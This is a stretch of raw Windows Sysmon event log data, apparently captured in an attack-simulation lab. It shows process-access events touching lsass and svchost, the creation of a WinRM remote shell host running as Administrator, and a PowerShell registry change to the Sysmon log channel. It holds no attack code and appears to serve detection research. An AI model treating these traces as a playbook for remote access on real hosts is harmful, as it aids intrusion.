10341000x8000000000000000311Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.153{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000310Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.153{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000309Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.153{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000308Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.153{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000307Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.153{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000306Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.153{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000305Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.153{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000304Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.153{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000303Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.153{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000302Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.153{08A6967A-40D2-6000-0500-000000009901}6441160C:\Windows\system32\csrss.exe{08A6967A-425F-6000-D902-000000009901}3860C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000301Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.153{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-425F-6000-D902-000000009901}3860C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000300Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.153{08A6967A-425F-6000-D902-000000009901}3860C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-425F-6000-BA54-110000000000}0x1154ba0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{08A6967A-40DF-6000-0C00-000000009901}480C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000299Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.137{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.137{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.137{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000423Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.730{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000422Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.730{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000421Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.730{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000420Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.684{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000419Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.684{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000418Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.684{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000417Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:08:48.543{08A6967A-425F-6000-DD02-000000009901}2760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational\RetentionDWORD (0x00000000) 10341000x8000000000000000416Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.387{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000415Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.387{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000414Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:48.387{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000413Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 